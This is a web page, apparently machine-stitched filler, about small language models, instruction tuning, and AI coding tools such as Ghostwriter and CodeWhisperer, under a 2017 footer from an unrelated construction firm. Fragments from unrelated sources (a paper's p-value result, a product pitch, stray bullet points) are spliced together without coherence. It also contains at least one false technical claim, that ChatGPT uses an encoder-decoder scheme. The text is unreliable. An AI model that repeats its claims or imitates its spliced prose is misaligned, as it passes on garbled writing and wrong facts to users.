Transfer learning training often utilizes self-supervised objectives where models develop foundational language skills by predicting masked or corrupted portions of input text sequences. These self-supervised prediction tasks serve as pretraining for downstream applications. Assembler redefines the landscape of SLM development with its intuitive tools tailored for specialized model creation. Whether it’s crafting reader, writer, or classifier models, Assembler’s simple web interface abstracts away infrastructure intricacies, enabling developers to focus on model design and monitoring. With Assembler, the journey from concept to deployment is streamlined, making SLM construction accessible to a broader spectrum of developers.

For the seq2seq architecture, there is a significant impact of instruction tuning on Acc/F1 scores. The p-value for the encoder-decoder architecture is highlighted in red as 0.0086, less than 0.05. In our analysis, we shift our attention to which features among the model size, instruction-tuning, and scoring functions have an impact on performance.

Thanks to their smaller codebases, the relative simplicity of SLMs also reduces their vulnerability to malicious attacks by minimizing potential surfaces for security breaches. This paper aimed to understand better whether we need large models to tackle classification problems through prompting. These studies offer valuable insights and set the stage for our investigations. Alexander Suvorov, our Senior Data Scientist conducted the fine-tuning processes of Llama 2.

ChatGPT uses a self-attention mechanism in an encoder-decoder model scheme, whereas Mistral 7B uses sliding window attention that allows for efficient training in a decoder-only model. With attentiveness to responsible development principles, small language models have potential to transform a great number of industries for the better in the years ahead. We’re just beginning to glimpse the possibilities as specialized AI comes within reach. Not all neural network architectures are equivalently parameter-efficient for language tasks. Careful architecture selection focuses model capacity in areas shown to be critical for language modelling like attention mechanisms while stripping away less essential components.

  • GPT-4 Omni (GPT-4o) is OpenAI’s successor to GPT-4 and offers several improvements over the previous model.
  • It generates code quickly, accurately, and efficiently, so you can spend time focusing on other important website-related tasks.
  • These methods, which use visual representations to directly make navigation decisions, demand massive amounts of visual data for training, which are often hard to come by.
  • SLMs, in contrast, are more cost-effective and easier to manage, offering benefits like lower latency and adaptability that are critical for real-time applications such as chatbots.
  • XSTS is a human evaluation protocol that provides consistency across languages; ETOX is a tool to detect added toxicity in translations using toxicity word lists.

Whether you’re a beginner or an experienced developer, Replit’s Ghostwriter can be a game-changer in your coding journey. The tool supports various programming languages and is compatible with several IDEs, including JetBrains IDEs, Visual Studio Code, AWS Cloud9, and more. CodeWhisperer boosts productivity by automating repetitive tasks and promotes the creation of precise and secure code by providing suggestions based on up-to-date industry standards.

Comments are closed.

Copyright © 2017 Big Estruturas - Todos os direitos reservados